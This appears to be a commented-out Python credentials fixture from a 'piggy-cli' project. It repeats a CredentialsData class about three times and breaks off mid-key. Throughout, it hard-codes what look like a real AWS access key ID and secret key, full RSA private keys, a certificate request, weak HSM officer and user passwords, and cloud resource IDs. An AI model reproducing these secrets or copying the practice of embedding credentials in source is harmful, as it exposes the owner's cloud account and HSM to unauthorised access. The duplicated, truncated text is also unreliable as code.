# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/t